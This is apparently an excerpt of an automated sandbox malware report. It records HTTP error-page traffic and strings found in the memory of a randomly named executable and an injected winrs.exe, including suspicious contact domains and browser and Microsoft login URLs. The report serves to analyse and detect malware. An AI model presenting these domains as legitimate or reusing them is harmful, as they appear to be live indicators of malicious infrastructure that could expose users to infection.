6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYRZMjvtKDvtYtVb3lYvBpbbqmLG06P6yt9XF5QwA7ZGUcLTM3Q%2BNNmmC4meZ%2FmNdVifSxpekpIcdjl68KTJ2HcBfjbLX7%2FB2x1BhRMRizEqMPJhRL891e7C91C8pYtHsLxZD3zV7rELpGA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed22e0aba441df-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5slkb%2FcdyNrovpIyoAJUiiDdbou1Skt4tZCjQWwi8UtTIjfhG%2FkunzltPodJ5iMYNAVtYwkZEwpawvQyBX2cJva90I%2Fqa3NLA%2BsgeoNjPTqIcjxOwL%2Bicx8AXdGrd8x5AUZyb4%2BE1Ae73J0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed22f0aae64286-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FW46V0Oq5KMVw7ISjMoLV8on3q4mwgE%2BpFRUF1J%2FgMnN1eKtZDRaR%2FJiLQXow9E3I7affssyLs%2FE4cYr5IgLgNpMFlTAOyQkleau2%2FQyhSCRwSxBce3a9soiX19AKkpqf%2FCWrmTnte67NI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed2301f9380fa1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1525&rtt_var=762&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10881&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F10gPv6OCHsUQcbfnGTrcEBymziWM5TIYElYGd2j1jnYhgEGNyAZ8UrI78sAt3xZIZnDBcu3eVWj9HqAQAKUZ3Ok6S%2BALvIx6a9MuPrfHqEmoujCAqYF7yRZIDJQLZI4bb%2BURB3kPstjEPg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed231288975e80-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:14:57 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZWXZpUTestMV0qYYHE2M0J39ZNIz1J1MJ%2BNiLJz5QiPi6KE8pIw%2F96t3LYm3rUP9h2kkFGuoLF7aZaoYNmpm69I6NlUikaorJKRw%2Fou0vg%2BVskHH3HE2muhRthvdtOzr1cIG5JFS28%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed23e17e190f70-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 37 30 0d 0a 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f70\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:14:59 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jybOHATB0uEZm7pKu9%2BpEeRIOLFF38PJIBsVJ9Fi6yR6TUpRujWfH8p50rEUmE3FW9B2C8DNpYL8w%2B8ja7%2BeRduRXe1fFIAoEfS5nbFSk9nzy9LoTgXx0t5TJ%2BoV%2Fv6jZE2OnJl0L2M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed23f17f848cdc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2030&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:15:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:15:02 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bmHic3xQQQFH9%2FrgA7V0HODBCP%2FrwI4z6Q1F7qfKJpUFXk1wZlB09t0tOr4yfgw7nFGQ5P%2F84Xo%2BJtUf3i1muBzfE8OEC6TpBNxjuwtvDLiAfxVlpEzDOX05SpGJJWTxH5R6ImEk3I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed24018f274205-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10872&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:15:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:15:04 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5Uvh9s%2FcUrTyweVGtBN4pIsqy9abNbyWxw8Yjtg0Q1VkgvK7JKYoDTFzyCtjozq7u9VC0nN3Zy46SrBZmlrdzTa3%2FedcNK9dt4Taf%2F%2FxcDqOnH5ky73Gp5a%2Fr9e2M6NaqgveTwL6tk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed2411787f7cee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 08 Jan 2025 15:15:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 08 Jan 2025 15:15:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 08 Jan 2025 15:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: winrs.exe, 00000003.00000002.3521201601.0000000004098000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000002FD8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3522074275.0000000004D85000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dating-apps-az-dn5.xyz
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3522074275.0000000004D85000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dating-apps-az-dn5.xyz/pn0u/
                Source: winrs.exe, 00000003.00000002.3521201601.00000000043BC000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaX
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www70.earbudsstore.shop/
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winrs.exe, 00000003.00000002.3521201601.0000000004D28000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000003.00000002.3522437440.0000000006070000.00000004.00000800.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000003C68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
